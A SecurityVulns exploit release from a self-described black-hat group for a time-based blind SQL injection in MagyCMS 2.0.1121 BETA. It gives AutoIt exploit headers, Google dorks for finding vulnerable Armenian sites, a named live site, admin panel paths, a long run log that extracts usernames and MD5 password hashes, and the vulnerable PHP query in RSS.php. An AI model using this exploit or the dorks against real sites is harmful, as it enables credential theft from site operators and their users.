SecurityvulnsSECURITYVULNS:DOC:28482Magy cms v 2.0.1121 BETA Blind Sql injection
Hello Dear ЗАРАЗА,
Please see attach.
Attached file is commented and complete exploit which is written in AUTOIT.
It exploits targetted cms using time based way and obtains default 5 usernames + corresponding MD5 passwords from target site.
If anything unclear please let us know.
TIA as always.
/AkaStep
poc.au3
#Region ;**** Directives created by AutoIt3Wrapper_GUI****
#AutoIt3Wrapper_Outfile=cpl.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI****
#NoTrayIcon
#include <Array.au3>
#include <Inet.au3>
#include <String.au3>
#include <File.au3>
#cs
THIS IS A COMPLETE EXPLOIT WHICH IS WRITEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
THIS IS A CONSOLE APPLICATION.
IT'S MAIN PURPOSE TO EXPLOIT BLIND SQL INJECTION VULNERABILITY IN magy cms v 2.0.1121 BETA USING TIME BASED WAY and obtain usernames + MD5 passwords.
Default it'll obtain 5 usernames and corresponding MD5 PASSWORDS from vulnerable site.
Since it uses time based way it is really slow exploit.But it is more convenient way than manual work;)
In fact i coded it For Fun because we always prefer manual work.
- ANYWAYS, save it as in eg: poc.au3 and COMPILE + ENJOY) *
#ce
#cs
============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ==================
Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and Newest versions also affected)
Vendor: http://www.emagy.com && broncoway.com
Vuln Type: Blind SQL injection
Exploitation technique: Time Based.
Exploit: Available
Credits: AkaStep & BOT_25 & CAMOUFL4G3
ShouTz to mariaoza;)
CAMOUFL4G3 says: FreeDom is Paradise :P
DORK 1:
google+ site:am Website by Broncoway
DORK 2: google+ site:am inurl: /magycms/
Admin Panel:
site.tld/magycms/Admin/
or
site.tld/magycms/Admin/Login.php
Demo: http://www.sgp.am
Example usage of exploit:
cmd.exe
> D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/
######################################################
MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit
Exploitation technique: Time Based
Author: AkaStep & BOT_25
######################################################
[+] Verifying your internet connection… Please Wait…[+]
[+] Inet Connection is OK … [+]
[+] Verifying is Target Site Vulnerable? Please wait…[+]
[+] Reply from target site: [+]
[+] - - - - * Vulnerable! * - - - - . [+]
[+] Trying to get average value for sleep(1) if condition is TRUE…[+]
[+] Please wait… [+]
[+] AVG sleep timeout FOR TRUE CONDITION IS: 1087 ms [+]
[+] AVG sleep timeout FOR FALSE CONDITION IS: 93 ms [+]
[+] Getting To Fetch Username(s) from table… Please wait… [+]
[+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [tes]. Responce Time: 1080.99278273973 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms. Logging to axa.txt… [+]
[#] Username0 => [manager] [#]
[#] Username1 => [root] [#]
[#] Username2 => [d] [#]
[#] Username3 => [test] [#]
-
Total 4 users *
[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]
[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait… [+]
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 0
Responce Time: 1122.93256476205 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04
Responce Time: 1147.73191815969 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e
Responce Time: 1093.4105956323 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8
Responce Time: 1086.12022668676 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e
Responce Time: 1088.69703233325 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e4
Responce Time: 1079.73130163186 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47
Responce Time: 1089.67269514766 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e
Responce Time: 1120.84654283897 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e6
Responce Time: 1096.57454880375 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68
Responce Time: 1197.06674603001 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a
Responce Time: 1117.15728038546 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7
Responce Time: 1074.80582819299 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b
Responce Time: 1090.67017703246 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b5
Responce Time: 1095.4439395126 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58
Responce Time: 1079.56000213028 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b585
Responce Time: 1121.39697688334 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b5859
Responce Time: 1069.7244734608 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594
Responce Time: 1088.90167696824 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594f
Responce Time: 1090.38322342555 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fd
Responce Time: 1131.33884657918 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdc
Responce Time: 1085.94070681407 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf
Responce Time: 1086.03164216324 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf9
Responce Time: 1085.01732856736 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf99
Responce Time: 1090.81806852607 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994
Responce Time: 1164.10285238106 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c
Responce Time: 1087.62590294072 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5
Responce Time: 1084.24126538578 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d
Responce Time: 1110.72200045738 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d4
Responce Time: 1095.35167837798 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d49
Responce Time: 1100.45665915848 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490
Responce Time: 1141.79013618122 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490d
Responce Time: 1166.55627727462 ms.
Need to fetch other: [ NONE ] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e
Responce Time: 1171.26590832908 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e1
Responce Time: 1132.57401498087 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10
Responce Time: 1208.55810555533 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10a
Responce Time: 1123.42031597051 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10ad
Responce Time: 1122.12616389991 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc
Responce Time: 1082.92028182339 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3
Responce Time: 1089.85126266028 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc39
Responce Time: 1140.08007343197 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc394
Responce Time: 1148.83027251909 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949
Responce Time: 1091.6165547748 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949b
Responce Time: 1087.22355838061 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba
Responce Time: 1073.28650311553 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba5
Responce Time: 1075.00146049429 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59
Responce Time: 1075.08258904097 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59a
Responce Time: 1103.84616628081 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59ab
Responce Time: 1088.21680476932 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abb
Responce Time: 1091.30892994201 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe
Responce Time: 1120.06679051525 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe5
Responce Time: 1102.02194814024 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56
Responce Time: 1142.12833929081 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e
Responce Time: 1103.72041465256 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e0
Responce Time: 1111.04395079055 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e05
Responce Time: 1214.34433706028 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057
Responce Time: 1163.34768347812 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f
Responce Time: 1201.57191540286 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f2
Responce Time: 1138.68858765629 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20
Responce Time: 1116.66783999098 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f
Responce Time: 1098.96241373153 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f8
Responce Time: 1130.48200572043 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f88
Responce Time: 1108.71546050055 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883
Responce Time: 1116.813345572 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883e
Responce Time: 1088.2162383657 ms.
Need to fetch other: [ NONE ] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 3
Responce Time: 1112.91223563393 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 32
Responce Time: 1103.2336007669 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326
Responce Time: 1073.39268625061 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 3263
Responce Time: 1078.83931116799 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 32637
Responce Time: 1073.24368450567 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373
Responce Time: 1097.87935978848 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373d
Responce Time: 1156.96056540113 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da
Responce Time: 1072.94168611591 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5
Responce Time: 1109.29933992676 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56
Responce Time: 1078.17109775162 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562
Responce Time: 1091.15269276676 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622
Responce Time: 1076.48035788689 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226
Responce Time: 1135.50237933379 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269
Responce Time: 1203.56181913304 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622693
Responce Time: 1090.62271190795 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226931
Responce Time: 1092.65591544045 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316
Responce Time: 1100.2446888696 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622693167
Responce Time: 1094.95098541072 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226931679
Responce Time: 1128.80178191581 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790
Responce Time: 1169.40833252404 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622693167903
Responce Time: 1096.74959509033 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226931679032
Responce Time: 1178.17792216336 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326
Responce Time: 1106.2009016093 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c
Responce Time: 1300.28445742105 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c0
Responce Time: 1092.92270156983 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00
Responce Time: 1127.17008586904 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a
Responce Time: 1098.36618620519 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a9
Responce Time: 1113.63942520058 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a99
Responce Time: 1125.85533775888 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a997
Responce Time: 1151.71279577202 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a9972
Responce Time: 1133.74918720454 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a9972f
Responce Time: 1126.98230301967 ms.
Need to fetch other: [ NONE ] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 7
Responce Time: 1109.83144103983 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74
Responce Time: 1098.13795060885 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a
Responce Time: 1096.22027336493 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5
Responce Time: 1112.61976585727 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d
Responce Time: 1142.74313282603 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1
Responce Time: 1084.91810768561 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1f
Responce Time: 1112.79996992547 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ff
Responce Time: 1098.22970548891 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffc
Responce Time: 1162.94171493733 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce
Responce Time: 1288.16907398647 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce4
Responce Time: 1141.83313523826 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce47
Responce Time: 1103.65852377924 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472
Responce Time: 1168.90490496762 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f
Responce Time: 1096.50154288596 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0
Responce Time: 1139.7646542839 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f02
Responce Time: 1108.4753730338 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f020
Responce Time: 1088.28836460353 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206
Responce Time: 1077.87990864862 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206d
Responce Time: 1079.14208898928 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd
Responce Time: 1108.17988076703 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd4
Responce Time: 1164.49911938021 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48
Responce Time: 1100.86175303173 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c
Responce Time: 1083.53360421294 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8
Responce Time: 1094.66155316143 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8e
Responce Time: 1079.25520931559 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee
Responce Time: 1089.64739495061 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee4
Responce Time: 1075.80823227561 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44
Responce Time: 1078.8765208783 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44c
Responce Time: 1110.63264652718 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca
Responce Time: 1081.87636987911 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6
Responce Time: 1079.1007891431 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt…
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6c
Responce Time: 1100.79408534274 ms.
Need to fetch other: [ NONE ] symbol(s).
Logging to axa.txt…
Username: [manager] MD5 HASH: [04e8e47e68a7b58594fdcf994c5d490d]
Username: [root] MD5 HASH: [e10adc3949ba59abbe56e057f20f883e]
Username: [d] MD5 HASH: [326373da562269316790326c00a9972f]
Username: [test] MD5 HASH: [74a5d1ffce472f0206dd48c8ee44ca6c]
[+] Usernames And MD5 passwords saved to : mainlog.txt [+]
[+] Exploit Finished!. GooD Luck;) [+]
[+] Exit! [+]
Vulnerable Code Section:
========================== BEGIN ===================================
//magycms/Framework/public/RSS.php?Page=
/*
<?
// Check if data.inc.php is included
if(!isset($FRAMEWORK_PATH))
require_once(dirname(FILE)."/…/…/Admin/Inc/data.inc.php");
require_once(dirname(FILE)."/…/Common.php");
require_once(dirname(FILE)."/…/Links.php");
require_once(dirname(FILE)."/…/URL.php");
require_once($CMS_ROOTPATH . 'Admin/Inc/db/adodb.inc.php');
/**
* Returns News Category for page with passed name
*
* @param string $page
* @return int ID of category
*/
function getCatByPage($page)
{
global $db, $tbl_Pages, $tbl_News_Config, $SITEID;
// Get Page ID for fetching Category
$query = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch category form DB;
$query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
